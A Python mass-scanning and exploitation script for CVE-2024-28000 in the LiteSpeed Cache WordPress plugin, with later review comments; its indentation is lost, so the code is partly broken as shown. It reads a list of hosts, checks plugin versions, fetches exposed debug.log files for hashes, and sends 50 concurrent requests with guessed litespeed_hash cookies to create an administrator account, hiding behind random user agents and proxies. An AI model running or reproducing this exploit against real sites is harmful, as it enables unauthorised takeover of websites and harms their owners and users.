import re
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore, Style
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from concurrent.futures import ThreadPoolExecutor
from inspect import signature
from fake_useragent import UserAgent
ua = UserAgent()
from urllib.parse import urlparse
import queue
from alive_progress import alive_bar
import string
import random
import concurrent.futures
import time
# check_vulnerability(domain): probe one host for the LiteSpeed Cache issue
# tracked as CVE-2024-28000 and append the findings to local text files.
#
# NOTE(review): this listing lost its indentation, so the nesting below cannot
# be recovered with certainty. The comments describe each statement and hedge
# wherever the control flow depends on the missing indentation.
#
# Stages, in source order:
#   1. Build candidate base URLs for `domain`.
#   2. GET the plugin's readme.txt and read its "Stable tag:" version.
#   3. GET the admin-ajax crawler action and test for a short 200 response.
#   4. GET /wp-content/debug.log and look for PHP / LiteSpeed log markers.
#   5. POST 50 user-creation requests through send_request. This stage is
#      state-changing on the remote site, not a read-only check.
#   6. GET debug.log again and record the first "[Router] hash not match" line.
#
# For log review on the receiving side, the request sequence above (the three
# GET paths, then POSTs to /wp-json/wp/v2/users carrying `litespeed_hash` and
# `litespeed_role` cookies and the fixed username below) is what this script
# leaves behind. Stages 4 and 6 depend on /wp-content/debug.log being readable
# over HTTP.
#
# Reads the module-level names `proxies` and `ua`. Has no return statement.
# Every request uses verify=False, so TLS certificates are not validated.
def check_vulnerability(domain):
# Drop the last character when it is not an ASCII letter or digit (for example
# a trailing "/"). An empty `domain` raises IndexError on `domain[-1]`.
if not domain[-1] in string.ascii_letters + string.digits:
domain = domain[:-1]
# NOTE(review): this `else:` opens directly with `url_list_x = []`, so on the
# trimming branch above the list is either never created or the rest of the
# function is skipped, depending on the lost indentation. Either way a trimmed
# domain does not appear to get probed -- confirm against the original file.
else:
url_list_x = []
# No scheme given: try https/http, each with and without "www.". The two
# "...://www." entries in the tuple are already covered by the bare schemes.
if not (domain.lower()).startswith(('http://', 'https://', 'http://www.', 'https://www.')):
tar_1 = 'https://www.' + domain
tar_2 = 'https://' + domain
tar_3 = 'http://www.' + domain
tar_4 = 'http://' + domain
url_list_x.append(tar_1)
url_list_x.append(tar_2)
url_list_x.append(tar_3)
url_list_x.append(tar_4)
else:
url_list_x.append(domain)
# send_request: one POST to the WordPress REST users endpoint with an
# administrator-role payload. The `url` parameter is accepted but never used;
# the request goes to `target`, which is not defined in this function --
# presumably the loop variable of the `for target in url_list_x` below, which
# would make this a nested function (confirm).
def send_request(url):
# Fixed account data sent with every attempt. The e-mail value is the hosting
# page's address-obfuscation placeholder, not the address in the original file.
user_data = {
'username': "asdasdsad",
'password': "asdasdsad",
'email': '[email protected]',
'roles': ['administrator']
}
# `litespeed_hash` is a fresh random 6-character letters+digits string per
# call, drawn with the `random` module; `litespeed_role` is the fixed string "1".
cookies = {
"litespeed_hash": ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6)),
"litespeed_role": "1"}
# `response3` is never read, and the bare `except:` discards every error, so
# the caller cannot tell whether any request succeeded.
try:
response3 = requests.post(f'{target}/wp-json/wp/v2/users', cookies=cookies, json=user_data,
verify=False, timeout=40, proxies=proxies)
except:
pass
# Probe each candidate base URL in turn.
for target in url_list_x:
# Random User-Agent per target, taken from the module-level fake_useragent object.
headers = {
'User-Agent': ua.random,
}
try:
response = requests.get(target + "/wp-content/plugins/litespeed-cache/readme.txt", headers=headers, verify=False, timeout=30, proxies=proxies)
# match1: any dotted version after "Stable tag:" (the readme exists and parses).
match1 = re.search(r"Stable tag:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)*)", response.text)
# match2: versions this script treats as not affected -- 6.4 to 6.9, 7.x to 9.x,
# 6.3.0.2 to 6.3.0.9, and 6.3.1 upward.
# NOTE(review): there is no alternative for two-digit components such as 6.10
# or 10.0, so those tags fall through as "affected"; check the fixed version in
# the vendor advisory rather than relying on this list.
match2 = re.search(r"Stable tag:\s*(6\.[4-9]|[7-9]\.\d|6\.3\.0\.[2-9]|6\.3\.[1-9]\d*)", response.text)
if match1 and not match2:
response_1 = requests.get(target + "/wp-admin/admin-ajax.php?action=async_litespeed&litespeed_type=crawler", headers=headers, verify=False, timeout=30, proxies=proxies)
# A 200 response with a body shorter than 5 characters is what the script
# reports as a finding.
if response_1.status_code == 200 and len(response_1.text) < 5:
print('\033[92m' + "[CVE-2024-28000] -> " + str(target) + '\033[0m')
# The file object returned by open() is never closed explicitly
# (same pattern in the two other open(...).write calls below).
open('CVE-2024-28000_VU.txt', 'a').write(target + '\n')
# First debug.log read: keep at most 10000 lines and join them with no
# separator before searching for the marker substrings.
response_x = requests.get(target + "/wp-content/debug.log", headers=headers,
verify=False, timeout=30, proxies=proxies)
lines1 = response_x.text.splitlines()
first_linesxxxxx = lines1[:10000]
first_lines = ''.join(first_linesxxxxx)
if ('PHP Deprecated:' in first_lines) or ('PHP Notice:' in first_lines) or (
'X-LiteSpeed-Cache-Control:' in first_lines) or ('PHP Fatal error:' in first_lines) or (
'PHP Warning:' in first_lines) or ('X-LiteSpeed-Tag:' in first_lines) or (
'Crawling [url]' in first_lines) or ('Response headers' in first_lines):
print('\033[92m' + "[Debug Page] -> " + str(target) + '\033[0m')
open('Debug_page.txt', 'a').write(str(target) + '\n')
# 50 concurrent send_request calls against the same target. send_request has
# no return statement, so `responses_xx` is a list of None and is never read.
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
responses_xx = list(executor.map(send_request, [target] * 50))
# Second debug.log read. Despite its name, `first_2000_lines` holds up to
# 10000 lines.
response4 = requests.get(target + "/wp-content/debug.log", headers=headers, verify=False,
timeout=30, proxies=proxies)
lines = response4.text.splitlines()
first_2000_lines = lines[:10000]
# Record only the first log line containing the marker, then stop scanning.
for mm in first_2000_lines:
if '[Router] hash not match' in mm:
print('\033[92m' + "[Debug Get HASH] -> " + str(target) + " | " + mm +'\033[0m')
open('Wp-Debug-Hash.txt', 'a').write(target + "|" + mm +'\n')
break
# No-op branch; which statement it attaches to is lost with the indentation.
else:
pass
# Bare `except:` hides every failure in the block above, including network
# errors and any exception raised by the parsing code.
except:
pass
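def process_urls(url_queue, update_bar):
    """Worker loop: take hosts from *url_queue* and run the check on each.

    Runs until it receives the ``None`` sentinel. Every item taken from the
    queue, sentinel included, is acknowledged with ``task_done()`` so that a
    ``url_queue.join()`` in the producer can return.

    Args:
        url_queue: Queue of host strings, ended by one ``None`` per worker.
        update_bar: Zero-argument callable invoked once per processed host.
    """
    while True:
        url = url_queue.get()
        if url is None:
            # Sentinel: acknowledge it and let this worker finish.
            url_queue.task_done()
            break
        try:
            check_vulnerability(url)
        except Exception:
            # A failure on one host must not stop the worker. Unlike a bare
            # ``except:``, this lets KeyboardInterrupt/SystemExit propagate.
            pass
        finally:
            # Always balance the get() above, even when the check failed,
            # otherwise join() on the queue would never return.
            url_queue.task_done()
            update_bar()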
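def process_file(file_path, scan_thread):
    """Read hosts from *file_path* and hand them to a pool of worker threads.

    Args:
        file_path: UTF-8 text file with one host or URL per line.
        scan_thread: Requested worker count; anything ``int()`` accepts.

    Returns:
        None. Returns early, starting no threads, when the file holds no
        non-blank lines.

    Raises:
        ValueError: If *scan_thread* cannot be converted to an integer.
    """
    with open(file_path, 'r', encoding='utf-8') as file:
        # Skip blank lines: an empty string would only fail inside the check
        # and inflate the progress-bar total.
        urls = [entry for entry in (line.strip() for line in file) if entry]
    if not urls:
        # ThreadPoolExecutor rejects max_workers=0, so stop here.
        return

    # At least one worker, never more workers than hosts.
    num_workers = max(1, min(int(scan_thread), len(urls)))
    url_queue = queue.Queue()
    with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
        with ThreadPoolExecutor(max_workers=num_workers) as executor:
            for _ in range(num_workers):
                executor.submit(process_urls, url_queue, bar)
            for url in urls:
                url_queue.put(url)
            # One None sentinel per worker so every worker loop terminates.
            for _ in range(num_workers):
                url_queue.put(None)
            url_queue.join()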
# Banner, printed in green through colorama and then reset.
# NOTE(review): the listing lost its indentation; this line is assumed to sit
# at module level, which would print it on every import -- confirm.
print(Fore.GREEN + ' CVE-2024-28000 Scan \n' + Style.RESET_ALL)
if __name__ == "__main__":
    # Command-line entry point: -f is the host list file, -t the worker count,
    # -p/--proxy an optional proxy URL.
    cli = argparse.ArgumentParser(description='CVE-2024-28000 Scan')
    cli.add_argument('-f', type=str, required=False, help='File list')
    cli.add_argument('-t', type=str, required=False, help="Scan thread")
    cli.add_argument('-p', '--proxy', dest="proxy", help="Example: socks5://127.0.0.1:10808", required=False)
    args = cli.parse_args()

    # `proxies` is a module-level name that check_vulnerability passes to every
    # requests call: a one-entry mapping keyed "socks5" when -p is given,
    # otherwise an empty string.
    proxies = {"socks5": args.proxy} if args.proxy else ''

    file_list = args.f
    scan_thread = args.t
    # Both -f and -t are needed to start; otherwise point the user at -h.
    if file_list is None or scan_thread is None:
        print(" -h to get help")
    else:
        process_file(file_list, scan_thread)